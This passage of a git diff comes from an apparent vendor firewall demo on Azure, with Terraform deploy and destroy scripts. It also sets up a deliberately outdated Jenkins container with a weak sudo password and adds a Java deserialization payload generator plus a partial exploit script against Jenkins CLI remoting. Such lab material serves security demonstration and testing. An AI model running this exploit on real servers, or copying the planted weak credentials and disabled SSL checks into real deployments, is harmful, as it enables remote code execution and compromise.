resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + # generate a unique share name to avoid overlaps in shared infra + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, rg_name, azure_region): + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Create Bootstrap + + tf = Terraform(working_dir='./WebInBootstrap') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, + skip_plan=True, **kwargs) + + resource_group = tf.output('Resource_Group') + bootstrap_bucket = tf.output('Bootstrap_Bucket') + storage_account_access_key = tf.output('Storage_Account_Access_Key') + web_in_bootstrap_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_bootstrap_output', web_in_bootstrap_output) + + if return_code1 != 0: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + update_status('web_in_bootstrap_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_bootstrap_status', 'success') + + share_prefix = 'jenkins-demo' + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + # print("vars {}".format(WebInDeploy_vars)) + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = tf.output('MGT-IP-FW-1') + + logger.info("Got these values from output \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebInFWConf failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-master/destroy-old.py b/azure/Jenkins_proj-master/destroy-old.py new file mode 100644 index 00000000..305e8925 --- /dev/null +++ b/azure/Jenkins_proj-master/destroy-old.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + WebInBootstrap_vars.update({'RG_Name': rg_name}) + WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) + + tf = Terraform(working_dir='./WebInBootstrap') + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("WebInBootstrap destroyed") + deployment_status = {'WebInDeploy': 'Fail'} + + exit() + else: + deployment_status = {'WebInDeploy': 'Success'} + exit() + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/azure/Jenkins_proj-master/destroy.py b/azure/Jenkins_proj-master/destroy.py index 305e8925..3bc6b81b 100644 --- a/azure/Jenkins_proj-master/destroy.py +++ b/azure/Jenkins_proj-master/destroy.py @@ -1,121 +1,125 @@ -#!/usr/bin/env python3 -""" -# Copyright (c) 2018, Palo Alto Networks -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -# Author: Justin Harris jharris@paloaltonetworks.com - -Usage: -git -python destroy.py - -""" +from azure.cli.core import get_default_cli +import sys +import tempfile import argparse import logging +import subprocess +import os from python_terraform import Terraform logger = logging.getLogger() -handler = logging.StreamHandler() -formatter = logging.Formatter('%(levelname)-8s %(message)s') -handler.setFormatter(formatter) -logger.addHandler(handler) +# handler = logging.StreamHandler() +# formatter = logging.Formatter('%(levelname)-8s %(message)s') +# handler.setFormatter(formatter) +# logger.addHandler(handler) logger.setLevel(logging.INFO) -def main(username, password): - username = username - password = password +# +# Usage azure_login.py -g rgname +# - WebInDeploy_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +sys.sterr = sys.stdout - WebInBootstrap_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +print('Logging in to Azure using device code') - albDns = '' - nlbDns = '' - fwMgt = '' +def run_cmd(cmd): + subprocess.call('az login', shell=True) + res = subprocess.call(cmd, shell=True) + print ('Result is {}'.format(res)) - # Set run_plan to TRUE is you wish to run terraform plan before apply - run_plan = False - deployment_status = {} - kwargs = {"auto-approve": True} +def delete_file(fpath): + if os.path.exists(fpath): + try: + os.remove(fpath) + print ('Removed state file {}'.format(fpath)) + except Exception as e: + print ('Unable to delete the file {} got error {}'.format(fpath, e)) + else: + print('No need to delete {} as it no longer exists'.format(fpath)) + +def az_cli(args_str): + temp = tempfile.TemporaryFile() + args = args_str.split() + logger.debug('Sending cli command {}'.format(args)) + code = get_default_cli().invoke(args, None, temp) + # temp.seek(0) + data = temp.read().strip() + temp.close() + return [code, data] + +def delete_rg(rg_name): + logger.info('Deleting resource group {}'.format(rg_name)) + cmd = 'group delete --name ' + rg_name + ' --yes' + code, data = az_cli(cmd) + if code == 0: + print ('Successfully deleted Rg {} {}'.format(code,rg_name)) + +def delete_state_files(working_dir, file_list): + """ + + :param working_dir: string + :param tfstate_files: list of files + :return: True or False + + Removes a list of files from a directory + + """ + for file_name in file_list: + fpath = working_dir + file_name + if os.path.exists(fpath): + delete_file(fpath) + else: + print('Already deleted file {}'.format(fpath)) + +def main (username, password): + #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) # # Destroy Infrastructure # - tf = Terraform(working_dir='./WebInDeploy') - rg_name = tf.output('RG_Name') - - attack_rg_name = tf.output('Attacker_RG_Name') - logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) - - WebInDeploy_vars.update({'RG_Name': rg_name}) - WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) - - if run_plan: - print('Calling tf.plan') - tf.plan(capture_output=False) - - return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) - # return_code1 =0 - print('Got return code {}'.format(return_code1)) - - if return_code1 != 0: - logger.info("Failed to destroy build ") - - exit() - else: - - logger.info("Destroyed WebInDeploy ") + tfstate_file = 'terraform.tfstate' + tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup'] + + fpath = './WebInDeploy/' + tfstate_file + if os.path.isfile(fpath): + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + rg_name1 = tf.output('Attacker_RG_Name') + delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInDeploy + # + delete_state_files('./WebInDeploy/', tfstate_files) - WebInBootstrap_vars.update({'RG_Name': rg_name}) - WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) - tf = Terraform(working_dir='./WebInBootstrap') + fpath = './WebInBootstrap/' + tfstate_file + if os.path.isfile(fpath): + delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInBootstrap + # + delete_state_files('./WebInBootstrap/', tfstate_files) - if run_plan: - print('Calling tf.plan') - tf.plan(capture_output=False) - return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) - # return_code1 =0 - print('Got return code {}'.format(return_code1)) + # + # Delete state files WebInFWConf + # + delete_state_files('./WebInFWConf/', tfstate_files) - if return_code1 != 0: - logger.info("WebInBootstrap destroyed") - deployment_status = {'WebInDeploy': 'Fail'} - exit() - else: - deployment_status = {'WebInDeploy': 'Success'} - exit() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Get Terraform Params') parser.add_argument('-u', '--username', help='Firewall Username', required=True) parser.add_argument('-p', '--password', help='Firewall Password', required=True) - args = parser.parse_args() username = args.username password = args.password - + # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) main(username, password) diff --git a/azure/Jenkins_proj-master/jenkins/Dockerfile b/azure/Jenkins_proj-master/jenkins/Dockerfile new file mode 100644 index 00000000..1dea80e9 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/Dockerfile @@ -0,0 +1,38 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/* + + +ENV JENKINS_HOME /var/jenkins_home +ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log + +RUN groupadd -g 1000 jenkins \ + && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \ + && adduser jenkins sudo \ + && echo 'jenkins:jenkins' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +ENV JENKINS_VERSION 2.32.1 +RUN set -ex \ + && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ + && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ + && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref + +EXPOSE 8080 +EXPOSE 50000 + +COPY jenkins.sh /usr/local/bin/jenkins.sh + +RUN chmod +x /usr/local/bin/jenkins.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] + +CMD ["/usr/local/bin/jenkins.sh"] diff --git a/azure/Jenkins_proj-master/jenkins/config.xml b/azure/Jenkins_proj-master/jenkins/config.xml new file mode 100644 index 00000000..071c4fb7 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/config.xml @@ -0,0 +1,35 @@ + + + admin admin + + + N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq + + + + + + All + false + false + + + + + + default + + + + + + false + + + bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46 + + + admin@admin.com + + + diff --git a/azure/Jenkins_proj-master/jenkins/docker-compose.yml b/azure/Jenkins_proj-master/jenkins/docker-compose.yml new file mode 100644 index 00000000..61334042 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/docker-compose.yml @@ -0,0 +1,11 @@ +version: '3' +services: + jenkins: + build: . + container_name: jenkins + environment: + JAVA_OPTS: "-Djava.awt.headless=true" + JAVA_OPTS: "-Djenkins.install.runSetupWizard=false" + ports: + - "50000:50000" + - "8080:8080" diff --git a/azure/Jenkins_proj-master/jenkins/jenkins.sh b/azure/Jenkins_proj-master/jenkins/jenkins.sh new file mode 100644 index 00000000..b44f6ba2 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/jenkins.sh @@ -0,0 +1,24 @@ +#! /bin/bash -e + +: "${JENKINS_HOME:="/var/jenkins_home"}" +touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; } +echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG" + +# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + # read JAVA_OPTS and JENKINS_OPTS into arrays + java_opts_array=() + while IFS= read -r -d '' item; do + java_opts_array+=( "$item" ) + done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS") + + jenkins_opts_array=( ) + while IFS= read -r -d '' item; do + jenkins_opts_array+=( "$item" ) + done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS") + + exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@" +fi + +exec "$@" diff --git a/azure/Jenkins_proj-master/jenkins/tini b/azure/Jenkins_proj-master/jenkins/tini new file mode 100644 index 00000000..4e5b36a9 Binary files /dev/null and b/azure/Jenkins_proj-master/jenkins/tini differ diff --git a/azure/Jenkins_proj-master/payload/Payload.java b/azure/Jenkins_proj-master/payload/Payload.java new file mode 100644 index 00000000..cbd4c8b5 --- /dev/null +++ b/azure/Jenkins_proj-master/payload/Payload.java @@ -0,0 +1,189 @@ +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamException; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.PrivateKey; +import java.security.PublicKey; +import java.security.Signature; +import java.security.SignedObject; +import java.util.Comparator; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import java.util.concurrent.ConcurrentSkipListSet; +import java.util.concurrent.CopyOnWriteArraySet; + +import net.sf.json.JSONArray; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.collection.AbstractCollectionDecorator; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import org.apache.commons.collections.map.ReferenceMap; +import org.apache.commons.collections.set.ListOrderedSet; + +public class Payload implements Serializable { + + private Serializable payload; + + public Payload(String cmd) throws Exception { + + this.payload = this.setup(cmd); + + } + + public Serializable setup(String cmd) throws Exception { + final String[] execArgs = new String[] { cmd }; + + final Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + execArgs), new ConstantTransformer(1) }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + final Map innerMap = new HashMap(); + + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException e) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + + Field f2 = null; + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException e) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array2 = (Object[]) f2.get(innimpl); + + Object node = array2[0]; + if (node == null) { + node = array2[1]; + } + + Field keyField = null; + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception e) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField( + "key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + PublicKey publicKey = keyPair.getPublic(); + + Signature signature = Signature.getInstance(privateKey.getAlgorithm()); + SignedObject payload = new SignedObject(map, privateKey, signature); + JSONArray array = new JSONArray(); + + array.add("asdf"); + + ListOrderedSet set = new ListOrderedSet(); + Field f1 = AbstractCollectionDecorator.class + .getDeclaredField("collection"); + f1.setAccessible(true); + f1.set(set, array); + + DummyComperator comp = new DummyComperator(); + ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); + csls.add(payload); + + CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); + CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); + + a1.add(set); + Container c = new Container(csls); + a1.add(c); + + a2.add(csls); + a2.add(set); + + ReferenceMap flat3map = new ReferenceMap(); + flat3map.put(new Container(a1), "asdf"); + flat3map.put(new Container(a2), "asdf"); + + return flat3map; + } + + private Object writeReplace() throws ObjectStreamException { + return this.payload; + } + + static class Container implements Serializable { + + private Object o; + + public Container(Object o) { + this.o = o; + } + + private Object writeReplace() throws ObjectStreamException { + return o; + } + + } + + static class DummyComperator implements Comparator, Serializable { + + public int compare(Object arg0, Object arg1) { + // TODO Auto-generated method stub + return 0; + } + + private Object writeReplace() throws ObjectStreamException { + return null; + } + + } + + public static void main(String args[]) throws Exception{ + + if(args.length != 2){ + System.out.println("java -jar payload.jar outfile cmd"); + System.exit(0); + } + + String cmd = args[1]; + FileOutputStream out = new FileOutputStream(args[0]); + + Payload pwn = new Payload(cmd); + ObjectOutputStream oos = new ObjectOutputStream(out); + oos.writeObject(pwn); + oos.flush(); + out.flush(); + + + } + +} \ No newline at end of file diff --git a/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar new file mode 100644 index 00000000..218510bc Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar new file mode 100644 index 00000000..c35fa1fe Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar new file mode 100644 index 00000000..98467d3a Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar new file mode 100644 index 00000000..93a3b9f6 Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar differ diff --git a/azure/Jenkins_proj-master/payload/exploit.py b/azure/Jenkins_proj-master/payload/exploit.py new file mode 100644 index 00000000..89c789d4 --- /dev/null +++ b/azure/Jenkins_proj-master/payload/exploit.py @@ -0,0 +1,92 @@ +import urllib +import requests +import uuid +import threading +import time +import gzip +import urllib3 +import zlib +import subprocess + +proxies = { +# 'http': 'http://127.0.0.1:8085', +# 'https': 'http://127.0.0.1:8090', +} + +TARGET = input("Enter Jenkins Target IP Address: ") +URL='http://' + TARGET + ':80/cli' + +PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' +PROTO = b'\x00\x00\x00\x00' + + +FILE_SER = open("payload.ser", "rb").read() + +def download(url, session): + + headers = {'Side' : 'download'} + #headers['Content-type'] = 'application/x-www-form-urlencoded' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Session'] = session + headers['Transfer-Encoding'] = 'chunked' + r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) + print(r.content) + + +def upload(url, session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding'] = None + r = requests.post(url,data=data,headers=headers,proxies=proxies) + + +def upload_chunked(url,session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding']= None + headers['Transfer-Encoding'] = 'chunked' + headers['Cache-Control'] = 'no-cache' + + r = requests.post(url, headers=headers, 